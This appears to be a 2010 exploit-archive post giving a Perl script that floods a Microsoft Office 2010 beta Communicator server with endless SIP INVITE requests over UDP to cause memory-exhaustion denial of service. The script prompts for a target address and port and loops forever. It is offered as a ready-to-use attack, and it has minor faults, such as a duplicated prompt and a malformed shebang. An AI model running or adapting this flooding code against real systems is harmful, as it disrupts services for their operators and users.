Microsoft Office ( 2010 beta ) Communicator SIP DoS Exploit
Posted on 06 April 2010
=========================================================== Microsoft Office ( 2010 beta ) Communicator SIP DoS Exploit =========================================================== ======================================================================================== | # Title : Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iqs3cur1ty.com/vb | # Tested on: windows SP2 | # Bug : Denial of service Exploit ====================== Exploit By indoushka ================================= # Exploit : #!usr/bin/perl ####################################################################################################################### # Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via # # a large number of SIP INVITE requests. # ####################################################################################################################### use IO::Socket; print(" Enter IP Address of Target Server: "); $vuln_host_ip = <STDIN>; print(" Enter IP Address of Target Server: "); $port = <STDIN>; $sock_sip = IO::Socket::INET->new( PeerAddr => $vuln_host_ip, PeerPort => $port, Proto => 'udp') || "Unable to create Socket"; #if the server is configured on TCP replace 'udp' with 'tcp'. while(1) { print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0 Via: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900 "; } #program never comes here for execution close($sock_sip); # Inj3ct0r.com [2010-04-06]
